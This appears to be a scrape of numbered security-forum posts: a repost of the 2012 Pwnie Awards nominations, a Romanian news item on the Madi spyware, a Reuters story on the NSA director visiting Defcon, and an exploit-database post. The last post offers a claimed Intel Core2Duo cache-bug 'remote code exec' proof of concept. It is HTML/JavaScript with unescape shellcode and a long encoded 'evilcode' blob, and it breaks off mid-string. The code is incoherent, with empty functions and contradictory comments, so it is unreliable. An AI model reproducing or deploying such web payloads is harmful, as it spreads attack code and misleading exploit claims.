  15. Nominations for Pwnie Awards Pwnie for Best Client-Side Bug Awarded to the person who discovered or exploited the most technically sophisticated and interesting client-side bug. These days, ‘client’ is pretty much synonymous with ‘web browser’, but don't forget about all the media player integer overflows! Pinkie Pie's Pwnium Exploit Credit: Pinkie Pie The Pwnie Award judges were the original bronies. In a blatant attempt at currying their favor, Pinkie Pie chose a handle near and dear to their hearts. How did he know that Pinkie Pie was our favorite? Just slightly less impressive than this feat of clairvoyance was Pinkie Pie's exploit chain of six bugs that got him full remote code execution in Chrome to win Google's Pwnium competition at CanSecWest. Sergey Glazunov's Pwnium Exploit Credit: Sergey Glazunov Not to be outdone by Pinkie Pie, Sergey's Pwnium exploit took advantage of at least 14 bugs (The Chrome security team apparently lost count after that -- numbers are hard). In another show of one-upmanship, he chose a handle of an extremely obscure My Little Pony. MS11-087: Unspecified win32k.sys TrueType font parsing engine vulnerability (CVE 2011-3402) Credit: Duqu Authors As seen in "Stuxnet 2: Electric Duquloo", this 100% reliable kernel-mode remote code execution exploit could rootkit any version of Windows ever from a font file embedded in a web page or various other file formats. What else could you possibly want from a client-side vulnerability? A cookie? Flash BitmapData.histogram() Info Leak (CVE 2012-0769) Credit: Fermin Serna Fermin demonstrated and documented in exquisite detail how to turn a lossy out-of-bounds memory read vulnerability into full chosen-address memory disclosure. He showed how proper heap manipulation and creativity can build a limited exploitation primitive into a much more powerful one. Oh right, we are supposed to make jokes about these. Too bad nothing actually runs Flash. iOS Code Signing Bypass (CVE 2011-3442) Credit: Charlie Miller Hackers are always looking for interesting ways around "the system", whichever one that may be. In this case, Charlie Miller hatched this get-rich-quick idea: Write a stock quote app for iOS and put it on the AppStore Discover a code signing bypass that allows third-party apps to dynamically download and execute code and use this in his rogue app Entice himself to download the app Download and inject code into the app to s py on the list of stocks that he was using the app to get quotes for Make lucrative trades based on this valuable information Unfortunately, before Charlie could profit sufficiently from this information, he talked to the press about his ingenius plot. Apple subsequently pulled his app from the AppStore and from his own iPhone hat had installed it (the only user of the app) as well as banned Charlie from the iOS Developer Program for one year. By doing this, Apple kept Charlie safe from himself for the entire next year. Pwnie for Best Server-Side Bug Awarded to the person who discovered or exploited the most technically sophisticated and interesting server-side bug. This includes any software that is accessible remotely without using user interaction. TNS Poison Attack (CVE-2012-1675) Credit: Joxean Koret Oracle TNS Listener vulnerabilities bring a tear to our eye. Joxean's attack is basically the forbidden love child between DNS poisoning and those classic TNS Listener vulnerabilities, allowing you to MITM connections to the database from across the Internet. ProFTPD Response Pool Use-after-Free (CVE-2011-4130) Credit: Anonymous Wait, use-after-free bugs exist outside of web browsers? Shame on them for trying to monopolize that bug class. Anyway, this post-auth use-after-free gets you remote code execution on ProFTPD. And that's what dreams are made of. Well, that and puppy tears. Ours are, anyway. "Are we there yet?" MySQL Authentication Bypass (CVE-2012-2122) Credit: Sergei Golubchik On vulnerable versions of MySQL simply asking to authenticate repeatedly enough times is enough to bypass authentication: "Can I log in as root now?" "How about now?" "Now?" For actual details, check out Pwnie Judge extraordinaire HD Moore's blog post. WordPress Timthumb Plugin 'timthumb' Cache Directory Arbitrary File Upload Vulnerability (CVE-2011-4106) Credit: Mark Maunder Here's a tip from some old hands at this game: if the software is named after the author's first name, it is likely INSECURE AS ALL HELL. This design error is case and point. Download files from attacker-specified URLs into a cache directory inside the webroot? Sounds like a great idea to me. Pwnie for Best Privilege Escalation Bug Awarded to the person who discovered or exploited the most technically sophisticated and interesting privilege escalation vulnerability. As more defense-in-depth systems like Mandatory Access Control and Virtualization are deployed, privilege escalation vulnerabilities are becoming more important. These vulnerabilities can include local operating system privilege escalations, operating system sandbox escapes, and virtual machine guest breakout vulnerabilities. Xen Intel x64 SYSRET Privilege Escalation (CVE-2012-0217) Credit: Rafal Wojtczuk It looks like Intel's x64 SYSRET instruction operates differently enough from AMD's x86_64 standard (some people call this "wrong") that an OS written to the AMD standard running on Intel processors includes a bonus privilege escalation feature. Namely, you can get the kernel (or hypervisor) to handle a SYSRET with a user-specified RSP. What could possibly go wrong? Wait, everyone else is vulnerable too?. Bonus in your attackers' favor. iOS HFS Catalog File Integer Underflow (CVE-2012-0642) Credit: pod2g This exploit was used for the Absinthe iOS 5.0/5.0.1 untether. It massaged the kernel heap into submission, copying over the syscall table and giving pod2g (as well as jailbreak users everywhere) a happy ending. And who doesn't love happy endings? MS11-098: Windows Kernel Exception Handler Vulnerability (CVE-2011-2018) Credit: Mateusz "j00ru" Jurczyk j00ru owned Windows. All of them. Ok, well just all of the 32-bit versions of Windows from NT through the Windows 8 Developer Preview. What have you done lately? And to top it off, he wrote a clear paper on it with some of the nicest boxy diagrams we have ever seen in a LaTeX paper. VMware High-Bandwidth Backdoor ROM Overwrite Privilege Elevation (CVE-2012-1515) Credit: Derek Soeder I'll admit it. The unspecified Pwnie Award judge writing this description never understands any of Derek's bugs and it's getting late and he wants to go to sleep. But Derek's bugs always look big pimpin' and he wishes that he did understand them. Pwnie for Most Innovative Research Awarded to the person who published the most interesting and innovative research in the form of a paper, presentation, tool or even a mailing list post. Packets in Packets: Orson Welles' In-Band Signaling Attacks for Modern Radios Travis Goodspeed Yo dawg, Travis heard you like packets, so he put packets in packets so that he could inject packets into your internal network from all the way across the Internet. Doesn't sound very neighborly to us, but it's still way cool. Smashing the Atom Tarjei Mandt What did the Windows kernel ever do to Tarjei to deserve the merciless beating he has subjected it to over the last several years? Has he not subjected it to enough pain? Apparently not yet. Injecting Custom Payloads Into Signed Windows Executables Igor Glucksmann Incomplete Code Signing attacks are not only useful for iOS jailbreaks, they can also be used to add a few more features to signed PE executables (i.e. software installers, updates, etc) without invalidating the Authenticode signatures. But why would anyone want to do that? The Case for Semantics-Based Methods in Reverse Engineering Rolf Rolles What you say is more important than how you say it. It turns out that this is true in machine code as well. Rolf's keynote presentation at REcon described how to take approaches from academic program analysis and apply them to real-world reverse engineering challenges. Comprehensive Experimental Analyses of Automotive Attack Surface Stephen Checkoway, et. al. Many hackers have been complaining about the extinction of unmitigated vanilla stack buffer overflows. It turns out that they are not extinct at all, they have all just migrated to YOUR CAR. Stephen Checkoway and the rest of his team identified and exploited these vulnerabilities through a burned CD, paired BlueTooth device, unpaired BlueTooth device, and through a phone call to the car's internal GSM cell phone. Yes, they can call up your car and install malware on it, which they actually implemented (how non-Academic of them). The future is a very scary place. Luckily, the majority of the Pwnie Award judges don't drive. Or use computers. Or phones. Pwnie for Lamest Vendor Response Coming soon! Pwnie for Best Song What kind of awards ceremony does not have an award for best song? There is strangely enough a long tradition of hacker-written songs and raps (parodies and originals). And in Pwnies past, we somehow coerced HD and Halvar to rap some of these. And rather then let it become anyone else's turn, we have a new rule. Nominations for 'Best Song' must actually have audio. For your listening pleasure, the nominees are: What You Need METASPLOIT! Marco Figueroa Giving shoutouts to almost all of the Pwnie Award judges definitely helps win a Pwnie nomination (for the record, offerings of 0day work better). Only time will tell if this song is a "certified Pwnie Award winner". NYAN Who would have thought that C++ method names from MSHTML.DLL could make such a catchy chorus? We never would have. The UW CSE Band The UW CSE Band has the unique distinction of being the first Best Song nominee that is sung (not rapped) by someone who can actually sing on key. This song, a cover of The Cranberries' "Zombie", gives us flashbacks to the mid-90's when server-side remotes and raver pants were plentiful. Give It Some Salt beep@bugslap.com The LinkedIn breach, explained in rap form. Control Dual Core Written for the Social Engineering Podcast, this song satisfies your corporate social engineering training requirement and you get CISSP points just by listening to it. Just tell your boss that we said so. Pwnie for Most Epic FAIL Sometimes giving 110% just makes your FAIL that much more epic. And what use would the Internet be if it wasn't there to document this FAIL for all time? This award is to honor a person or company's spectacularly epic FAIL. And the nominees are: The Anti-Virus Industry Anti-Virus Industry Do you really need us to elaborate? Herpesnet Francesco Pompo (aka Frk7) Even botmasters have trouble adhering to sound information security practices like choosing strong passwords, auditing their PHP code for vulnerabilities, and limiting the amount of their personal information that is available online. The malware.lu crew took advantage of fails in all of these to track down and dox the botmaster behind the Herpes botnet. If you find that one of your machines is infected with Herpes, ask your doctor what malware.lu can do for you. LinkedIn Breach of 6 Million Password Hashes LinkedIn What has 2500 employees, over 90 million users, no CSO, and hates salt? This company. F5 Static Root SSH Key F5 Networks Including a SSH authentication public key for root on all F5 devices is nice, putting the private key for it in the firmware where it can be found and then used against any other F5 device is even better. For FAIL, press F5. Pwnie for Epic 0wnage 0wnage, measured in owws, can be delivered in mass quantities to a single organization or distributed across the wider Internet population. The Epic 0wnage award goes to the hackers responsible for delivering the most damaging, widely publicized, or hilarious 0wnage. This award can also be awarded to the researcher responsible for disclosing the vulnerability or exploit that resulted in delivering the most owws across the Internet. "Flame" Windows Update MD5 Collision Attack Flame Authors Any attack that requires a breakthrough in cryptography to pull off is pretty cool in our book. And being able to pwn any Windows machine through Windows Update is pretty mass 0wnage. Certificate Authorities Everyone It turns out that Certificate Authorities themselves are one massive security vulnerability. How many more CAs need to get popped before we as an industry realize that allowing Bob's Bait, Tackle, and Certificates to issue wildcard certificates is a bad idea? iOS Jailbreaks iPhone Dev Team and Chronic Dev Team We love the jailbreakers and you should too. They publicly drop all of their exploits as 0day, convince millions of users to disable the security features on their own devices, and then keep those devices vulnerable to the released exploits until new exploits can be developed and released in the patched versions of iOS. Sursa: Pwnie Awards 2012
  16. Dupa scandalul virusului Flame, inca un virus "politic" a fost descoperit de firmele de securitate IT in Orientul Mijlociu. Virusul Madi sau Mahdi, folosit pentru obtinerea de informatii secrete, a fost depistat in Iran, Israel si Afganistan. Peste 800 de PC-uri ale agentiilor guvernamentale, ale institutiilor financiare si companiilor de infrastructura au fost infectate de virusul Madi, sustin expertii Kaspersky Lab si Seculert, potrivit unui comunicat remis HIT.ro. In timp ce scopul Flame a fost de a opri programul nuclear din Iran, virusul Madi sau Mahdi, ce este echivalent cu "Mesia" in Islam, are ca scop obtinerea de informatii secrete, de la emailuri si parole pana la transferul de fisiere. Troianul Madi permite infractorilor cibernetici sa fure informatii confidentiale de pe computerele cu sisteme de operare Microsoft Windows, sa monitorizeze comunicarea prin email si programele de mesagerie instant, sa inregistreze audio si intrarile din tastatura, precum si sa realizeze capturi de ecran. Analiza confirma faptul ca mai multi gigabytes de informatie au ajuns pe serverele infractorilor. Printre aplicatiile si paginile web spionate se numara conturile de Gmail, Hotmail, Yahoo! Mail, ICQ, Skype, Google+ si Facebook ale victimelor. Supravegherea era condusa si prin intermediul sistemelor ERP/CRM integrate, a contractelor de business si sistemelor de administrare financiara. Noua amenintare malware a fost detectata mult mai usor si are un cod mult mai putin complex decat virusul Flame, considerat cel mai sofisticat din istoria tehnologiei informatice. Sursa: Flame are un frate: inca un virus "politic" descoperit de firmele de securitate IT | Hit.ro
  17. (Reuters) - Computer geeks attending the world's largest annual hacking party in Las Vegas next week will have a rare chance to rub shoulders with the head of the U.S. National Security Agency. General Keith Alexander, director of the spy agency, will speak at the Defcon conference, marking the highest-level visit to date by a U.S. government official to the colorful gathering. Organizers expect some 15,000 hackers this year as they celebrate the 20th anniversary of the first U.S. hacking event that was open to the public. The Pentagon disclosed the visit on Friday. "We're going to show him the conference. He wants to wander around," said Jeff Moss, a hacker who organized the first Defcon conference while working as a messenger for a Seattle law firm. He now sits on an advisory committee to the Department of Homeland Security. Alexander may choose to talk shop with the techies. He holds four master's degrees, including ones in electronic warfare and physics. Still, Moss said he expect there could be some controversy over Alexander's presence among the diverse hacker crowd that attends the conference. The NSA plays both offense and defense in the cyber wars. It conducts electronic eavesdropping on adversaries, in addition to protecting U.S. computer networks. "I expect some people will say 'You are a sellout for having someone from the NSA speak," said Moss, who is known as the Dark Tangent in the hacking community. But he doesn't see it that way. "One of the things I try to do at Defcon is take some of the hackers out of their comfort zone. I want to expose them to people they would normally not hear from," he said. "Don't you think it's important to hear what the most senior person at the NSA has to say? I'm interested in hearing what he has to say," said Moss, whose full-time job is serving as chief security officer with ICANN, the Internet Corporation for Assigned Names and Numbers, which helps manage the infrastructure for much of the Internet. Hackers come to the conference to exchange information about tools of the trade, socialize and compete in hacking contests. There will be talks on attacking mobile phones and Google TV, more technical discussions on programming and discussions about government surveillance. Defcon offers a side conference for children, Defcon Kids, which Alexander will likely visit. It also trains hackers to pick locks and has an annual contest to measure who is best at persuading corporate workers to release sensitive data over the phone. Moss said he invited federal agents to the first Defcon conference, but that they politely declined. They showed up anyway, incognito. They kept coming, in bigger numbers, sometimes in uniform. "We created an environment where the feds felt they could come and it wasn't hostile," Moss said. "We could ask them questions and they wanted to ask the hackers about new techniques." He said he's spent a decade trying to get the head of the NSA to speak at Defcon, but he never imaged it would actually happen: "To me this is really validating of the whole culture." Sursa: U.S. spy agency chief to meet with hackers at Defcon | Reuters
  18. Citeste aici.
  19. <!-- 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm S4(uR4 member from r00tw0rm team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ''' # # Name : Intel Core2Duo cpu cache controller bug PoC # Date : july, 14 2012 # Author : S4(uR4 # Platform : all # Type : remote exploit # Web : www.r00tw0rm.com # Email : satsura@r00tw0rm.com # Credit and special thanx : Selena, nezumi # Tested on : Intel Core 2 Duo T5750, Intel Atom N270 # Special thanks to : r0073r, r4dc0re, Sid3^effects, L0rd CrusAd3r, KedAns-Dz, Angel Injection, gunslinger, JF, CrosS (1337day.com) # Xenu, Versus71, alsa7r, mich4th3c0wb0y, FInnH@X, th3breacher, s3rver.exe (r00tw0rm.com) --> <html> <head> <title> CPU cache controller bug exploit (Remote code exec mod poc)</title> </head> </html> <body> <script type="text/javascript"> var microcode = 257; var N_CORE = 4; var XXL = 9*1024*1024; var buf = 9437185; var p = {}; var bug; var result; var n = {}; function init_c(){}; function engine(p, n){}; function test(result){ // debug: testing micro-program for the old vm, does not work now // latter comment 1: oh. my! it works! wow! // latter comment 2: it works, but it does not what it's expected to // dw buf[]={1,-3,0, -6,9,1, 13,-67,2, -69,96,3, 1,-1,4, // -3,3,5, 16,-27,6, -66,99,7, 55,-1,8, -1,-3,9, 0,-67,10}; // the infinite loop will be patched on the fly because of the Intel CPU bug // addr of the test() func should be aligned by 4Kb boundary, // 1st dword will be changed to NOP, NOP, NOP, NOP // it's possible to change the kernel memory as well, // two things: // 1) alignment; // 2) the code is currently executed; // // engine() obtains the address of test(), but does not check it, // so if you replace it, you have to check the conditionals above by yourself. // also the content to overwrite. if you want to change data memory // it's supposed to be in the cache as well. /* ASM: .text .globl main .type main, @function L1: xorl %ecx, %ecx main: pushl %ebp movl %esp, %ebp popl %ebp loop L1 ret .size main, .-main DISASM: 080483b4 <L1>: 80483b4: 31 c9 xor %ecx,%ecx 080483b6 <main>: 80483b6: 55 push %ebp 80483b7: 89 e5 mov %esp,%ebp 80483b9: 5d pop %ebp 80483ba: e2 f8 loop 80483b4 <L1> 80483bc: c3 ret 80483bd: 90 nop 80483be: 90 nop 80483bf: 90 nop */ unescape('%u31C9%u5589%uE55D%u2EF8%uC390%u9090'); return 0; } function ThreadProc(lpParameter){ engine(buf, microcode*3); return(0); } function ThreadProc_dbg(bug){ var result = 1; test(result); if (result != 1){ document.write("<h1>[+] your CPU is buggy!<h1>"); } else{ document.write("<h1>[-] your CPU isn't buggy!<h1>"); //eueeuereturn(0); } } function microcode_vm(){ var evilcode = "6B70%u6E63%u2066%u6F72%u204A%u442E%u2066%u6F72%u2049%u6E74"+ "%u656C%u2043%u6F72%u6520%u3220%u4475%u6F20%u5435%u3735%u300D%u0A28%u6329"+ "%u2053%u656C%u656E%u612F%u2F32%u3030%u372C%u2032%u3030%u3800%u2B00%u0000"+ "%u0500%u0000%u2600%u0000%u3E00%u0000%u4702%u0000%uE7FD%uFFFF%u0000%u0000"+ "%uA3FF%uFFFF%uA7FF%uFFFF%u0100%u0000%u0200%u0000%u0A00%u0000%u0200%u0000"+ "%u0100%u0000%u0900%u0000%u0300%u0000%u0400%u0000%u1400%u0000%u0400%u0000"+ "%u1F00%u0000%u2B00%u0000%u0500%u0000%u2600%u0000%u3E00%u0000%u0600%u0000"+ "%u0D00%u0000%u2500%u0000%u0700%u0000%u3000%u0000%u4000%u0000%u0800%u0000"+ "%u6B00%u0000%u8F00%u0000%u0900%u0000%uFA00%u0000%u1201%u0000%u0A00%u0000"+ "%uC901%u0000%uE101%u0000%u0B00%u0000%u0C00%u0000%u3C00%u0000%u0C00%u0000"+ "%u1700%u0000%u3300%u0000%u0D00%u0000%u0E00%u0000%u3600%u0000%u0E00%u0000"+ "%u1500%u0000%u4D00%u0000%u0F00%u0000%u6800%u0000%u8800%u0000%u1000%u0000"+ "%uD300%u0000%u1701%u0000%u1100%u0000%uF201%u0000%u3A02%u0000%u1200%u0000"+ "%uF103%u0000%u3904%u0000%u1300%u0000%uF407%u0000%u2408%u0000%u1400%u0000"+ "%uEF0F%u0000%u3B10%u0000%u1500%u0000%u961F%u0000%uCE1F%u0000%u1600%u0000"+ "%u1D00%u0000%u7500%u0000%u1700%u0000%u2000%u0000%u7000%u0000%u1800%u0000"+ "%u1B00%u0000%u7F00%u0000%u1900%u0000%u2A00%u0000%u6200%u0000%u1A00%u0000"+ "%u1900%u0000%u7100%u0000%u1B00%u0000%u3C00%u0000%u8C00%u0000%u1C00%u0000"+ "%uE700%u0000%u2301%u0000%u1D00%u0000%u9E01%u0000%uE601%u0000%u1E00%u0000"+ "%u2500%u0000%u9D00%u0000%u1F00%u0000%uD800%u0000%u1801%u0000%u2000%u0000"+ "%uA301%u0000%u2702%u0000%u2100%u0000%uE203%u0000%u6A04%u0000%u2200%u0000"+ "%uE107%u0000%u6908%u0000%u2300%u0000%uE40F%u0000%u7410%u0000%u2400%u0000"+ "%uFF1F%u0000%u4B20%u0000%u2500%u0000%uC63F%u0000%u1E40%u0000%u2600%u0000"+ "%uAD7F%u0000%u0580%u0000%u2700%u0000%uD0FF%u0000%u6000%u0100%u2800%u0000"+ "%uCBFF%u0100%u6F00%u0200%u2900%u0000%uDAFF%u0300%u7200%u0400%u2A00%u0000"+ "%u29FF%u0700%u81FF%u0700%u2B00%u0000%u2C00%u0000%u9C00%u0000%u2C00%u0000"+ "%u3700%u0000%u9300%u0000%u2D00%u0000%u2E00%u0000%u9600%u0000%u2E00%u0000"+ "%u3500%u0000%uED00%u0000%u2F00%u0000%u4800%u0000%uE800%u0000%u3000%u0000"+ "%u3300%u0000%uF700%u0000%u3100%u0000%u5200%u0000%uDA00%u0000%u3200%u0000"+ "%u1100%u0000%u9900%u0000%u3300%u0000%u1400%u0000%u8400%u0000%u3400%u0000"+ "%u0F00%u0000%u9B00%u0000%u3500%u0000%u3600%u0000%uEE00%u0000%u3600%u0000"+ "%u7D00%u0000%u1501%u0000%u3700%u0000%uC001%u0000%u5002%u0000%u3800%u0000"+ "%u3B03%u0000%uDF03%u0000%u3900%u0000%u4A00%u0000%uC200%u0000%u3A00%u0000"+ "%u3900%u0000%uD100%u0000%u3B00%u0000%u5C00%u0000%u2C01%u0000%u3C00%u0000"+ "%uC701%u0000%u4302%u0000%u3D00%u0000%u3E03%u0000%uC603%u0000%u3E00%u0000"+ "%u4500%u0000%u3D01%u0000%u3F00%u0000%uB801%u0000%u3802%u0000%u4000%u0000"+ "%u4303%u0000%u4704%u0000%u4100%u0000%uC207%u0000%uCA08%u0000%u4200%u0000"+ "%uC10F%u0000%uC910%u0000%u4300%u0000%uC41F%u0000%uD420%u0000%u4400%u0000"+ "%uDF3F%u0000%uEB40%u0000%u4500%u0000%uE67F%u0000%uFE80%u0000%u4600%u0000"+ "%uCDFF%u0000%uE500%u0100%u4700%u0000%uF0FF%u0100%u8000%u0200%u4800%u0000"+ "%uABFF%u0300%uCF00%u0400%u4900%u0000%uBAFF%u0700%uD200%u0800%u4A00%u0000"+ "%u89FF%u0F00%u2100%u1000%u4B00%u0000%u4CFF%u1F00%u7C00%u2000%u4C00%u0000"+ "%uD7FF%u3F00%uF300%u4000%u4D00%u0000%uCEFF%u7F00%uF600%u8000%u4E00%u0000"+ "%uD5FF%uFF00%u8D00%u0001%u4F00%u0000%uA8FF%uFF01%uC800%u0002%u5000%u0000"+ "%u93FF%uFF03%uD700%u0004%u5100%u0000%uB2FF%uFF07%uFA00%u0008%u5200%u0000"+ "%uB1FF%uFF0F%uF900%u0010%u5300%u0000%uB4FF%uFF1F%uE400%u0020%u5400%u0000"+ "%uAFFF%uFF3F%uFB00%u0040%u5500%u0000%u56FE%uFF7F%u0EFF%uFF7F%u5600%u0000"+ "%u5D00%u0000%u3501%u0000%u5700%u0000%u6000%u0000%u3001%u0000%u5800%u0000"+ "%u5B00%u0000%u3F01%u0000%u5900%u0000%u6A00%u0000%u2201%u0000%u5A00%u0000"+ "%u5900%u0000%u3101%u0000%u5B00%u0000%u7C00%u0000%uCC01%u0000%u5C00%u0000"+ "%uA700%u0000%uE301%u0000%u5D00%u0000%u5E00%u0000%u2601%u0000%u5E00%u0000"+ "%u6500%u0000%uDD01%u0000%u5F00%u0000%u9800%u0000%uD801%u0000%u6000%u0000"+ "%u6300%u0000%uE701%u0000%u6100%u0000%uA200%u0000%uAA01%u0000%u6200%u0000"+ "%u2100%u0000%u2901%u0000%u6300%u0000%u2400%u0000%u3401%u0000%u6400%u0000"+ "%u3F00%u0000%u0B01%u0000%u6500%u0000%u0600%u0000%u5E01%u0000%u6600%u0000"+ "%u6D00%u0000%uC501%u0000%u6700%u0000%u9000%u0000%uA001%u0000%u6800%u0000"+ "%u0B00%u0000%u2F01%u0000%u6900%u0000%u1A00%u0000%u3201%u0000%u6A00%u0000"+ "%u6900%u0000%uC101%u0000%u6B00%u0000%uEC00%u0000%u5C02%u0000%u6C00%u0000"+ "%uF703%u0000%u5305%u0000%u6D00%u0000%uEE07%u0000%u5609%u0000%u6E00%u0000"+ "%uF50F%u0000%u2D11%u0000%u6F00%u0000%u881F%u0000%uA820%u0000%u7000%u0000"+ "%u733E%u0000%uB73F%u0000%u7100%u0000%u9200%u0000%u9A01%u0000%u7200%u0000"+ "%u5100%u0000%uD901%u0000%u7300%u0000%uD400%u0000%u4402%u0000%u7400%u0000"+ "%uCF03%u0000%u5B05%u0000%u7500%u0000%uF607%u0000%u2E09%u0000%u7600%u0000"+ "%uBD0F%u0000%u5511%u0000%u7700%u0000%u801F%u0000%u9020%u0000%u7800%u0000"+ "%u7B3E%u0000%u9F3F%u0000%u7900%u0000%u8A00%u0000%u8201%u0000%u7A00%u0000"+ "%u7900%u0000%u9101%u0000%u7B00%u0000%u9C00%u0000%u6C02%u0000%u7C00%u0000"+ "%u8703%u0000%u8304%u0000%u7D00%u0000%u7E06%u0000%u8607%u0000%u7E00%u0000"+ "%u8500%u0000%u7D02%u0000%u7F00%u0000%u7803%u0000%u7804%u0000%u8000%u0000"+ "%u8306%u0000%u8708%u0000%u8100%u0000%u820F%u0000%u8A11%u0000%u8200%u0000"+ "%u811F%u0000%u8921%u0000%u8300%u0000%u843F%u0000%u9441%u0000%u8400%u0000"+ "%u9F7F%u0000%uAB81%u0000%u8500%u0000%uA6FF%u0000%uBE01%u0100%u8600%u0000"+ "%u8DFF%u0100%uA501%u0200%u8700%u0000%uB0FF%u0300%uC001%u0400%u8800%u0000"+ "%uEBFF%u0700%u0F01%u0800%u8900%u0000%u7AFF%u0F00%u9201%u1000%u8A00%u0000"+ "%u49FF%u1F00%u6100%u2000%u8B00%u0000%u8CFE%u3F00%uBC00%u4000%u8C00%u0000"+ "%u97FF%u7F00%uB301%u8000%u8D00%u0000%u8EFF%uFF00%uB601%u0001%u8E00%u0000"+ "%u95FF%uFF01%uCD01%u0002%u8F00%u0000%uE8FF%uFF03%u0801%u0004%u9000%u0000"+ "%u53FF%uFF07%u9701%u0008%u9100%u0000%u72FF%uFF0F%uBA01%u0010%u9200%u0000"+ "%u71FF%uFF1F%uB901%u0020%u9300%u0000%u74FF%uFF3F%uA401%u0040%u9400%u0000"+ "%u6FFF%uFF7F%uBB01%u0080%u9500%u0000%u16FF%uFFFF%u4E00%u0000%u9600%u0000"+ "%u9DFE%uFFFF%uF500%u0000%u9700%u0000%uA0FF%uFFFF%uF001%u0000%u9800%u0000"+ "%u9BFF%uFFFF%uFF01%u0000%u9900%u0000%uAAFF%uFFFF%uE201%u0000%u9A00%u0000"+ "%u99FF%uFFFF%uF101%u0000%u9B00%u0000%uBCFF%uFFFF%u0C01%u0000%u9C00%u0000"+ "%u67FF%uFFFF%uA301%u0000%u9D00%u0000%u1EFF%uFFFF%u6600%u0000%u9E00%u0000"+ "%uA5FE%uFFFF%u1D00%u0000%u9F00%u0000%u58FF%uFFFF%u9801%u0000%uA000%u0000"+ "%u23FF%uFFFF%uA701%u0000%uA100%u0000%u62FF%uFFFF%uEA01%u0000%uA200%u0000"+ "%u61FF%uFFFF%uE901%u0000%uA300%u0000%u64FF%uFFFF%uF401%u0000%uA400%u0000"+ "%u7FFF%uFFFF%uCB01%u0000%uA500%u0000%u46FF%uFFFF%u9E01%u0000%uA600%u0000"+ "%u2DFF%uFFFF%u8501%u0000%uA700%u0000%u50FF%uFFFF%uE001%u0000%uA800%u0000"+ "%u4BFF%uFFFF%uEF01%u0000%uA900%u0000%u5AFF%uFFFF%uF201%u0000%uAA00%u0000"+ "%uA9FC%uFFFF%u01FE%uFFFF%uAB00%u0000%uAC00%u0000%u1C02%u0000%uAC00%u0000"+ "%uB700%u0000%u1302%u0000%uAD00%u0000%uAE00%u0000%u1602%u0000%uAE00%u0000"+ "%uB500%u0000%u6D02%u0000%uAF00%u0000%uC800%u0000%u6802%u0000%uB000%u0000"+ "%uB300%u0000%u7702%u0000%uB100%u0000%uD200%u0000%u5A02%u0000%uB200%u0000"+ "%u9100%u0000%u1902%u0000%uB300%u0000%u9400%u0000%u0402%u0000%uB400%u0000"+ "%u8F00%u0000%u1B02%u0000%uB500%u0000%uB600%u0000%u6E02%u0000%uB600%u0000"+ "%uFD00%u0000%u9503%u0000%uB700%u0000%u4001%u0000%uD003%u0000%uB800%u0000"+ "%uBB00%u0000%u5F02%u0000%uB900%u0000%uCA00%u0000%u4202%u0000%uBA00%u0000"+ "%uB900%u0000%u5102%u0000%uBB00%u0000%uDC00%u0000%uAC03%u0000%uBC00%u0000"+ "%u4701%u0000%uC303%u0000%uBD00%u0000%uBE00%u0000%u4602%u0000%uBE00%u0000"+ "%uC500%u0000%uBD03%u0000%uBF00%u0000%u3801%u0000%uB803%u0000%uC000%u0000"+ "%uC300%u0000%uC703%u0000%uC100%u0000%u4201%u0000%u4A03%u0000%uC200%u0000"+ "%u4100%u0000%u4902%u0000%uC300%u0000%u4400%u0000%u5402%u0000%uC400%u0000"+ "%u5F00%u0000%u6B02%u0000%uC500%u0000%u6600%u0000%u7E02%u0000%uC600%u0000"+ "%u4D00%u0000%u6502%u0000%uC700%u0000%u7000%u0000%u0002%u0000%uC800%u0000"+ "%u2B00%u0000%u4F02%u0000%uC900%u0000%u3A00%u0000%u5202%u0000%uCA00%u0000"+ "%u0900%u0000%uA102%u0000%uCB00%u0000%uCC00%u0000%uFC03%u0000%uCC00%u0000"+ "%u5701%u0000%u7303%u0000%uCD00%u0000%u4E00%u0000%u7602%u0000%uCE00%u0000"+ "%u5500%u0000%u0D02%u0000%uCF00%u0000%u2800%u0000%u4802%u0000%uD000%u0000"+ "%u1300%u0000%u5702%u0000%uD100%u0000%u3200%u0000%u7A02%u0000%uD200%u0000"+ "%u3100%u0000%u7902%u0000%uD300%u0000%u3400%u0000%u6402%u0000%uD400%u0000"+ "%u2F00%u0000%u7B02%u0000%uD500%u0000%uD600%u0000%u8E03%u0000%uD600%u0000"+ "%uDD01%u0000%uB504%u0000%uD700%u0000%uE007%u0000%uB00A%u0000%uD800%u0000"+ "%uDB0F%u0000%uBF12%u0000%uD900%u0000%uEA1F%u0000%uA222%u0000%uDA00%u0000"+ "%uD93F%u0000%uB142%u0000%uDB00%u0000%uFC7F%u0000%u4C82%u0000%uDC00%u0000"+ "%u27FF%u0000%u6301%u0100%uDD00%u0000%uDEFC%u0100%uA6FF%u0100%uDE00%u0000"+ "%uE501%u0000%u5D04%u0000%uDF00%u0000%u1807%u0000%u5809%u0000%uE000%u0000"+ "%uE30C%u0000%u670F%u0000%uE100%u0000%u2201%u0000%u2A03%u0000%uE200%u0000"+ "%uA100%u0000%uA903%u0000%uE300%u0000%uA401%u0000%uB404%u0000%uE400%u0000"+ "%uBF07%u0000%u8B0A%u0000%uE500%u0000%u860F%u0000%uDE12%u0000%uE600%u0000"+ "%uED1F%u0000%u4522%u0000%uE700%u0000%u103F%u0000%u2041%u0000%uE800%u0000"+ "%u8B7C%u0000%uAF7F%u0000%uE900%u0000%u9A01%u0000%uB204%u0000%uEA00%u0000"+ "%uE907%u0000%u410A%u0000%uEB00%u0000%u6C0F%u0000%uDC12%u0000%uEC00%u0000"+ 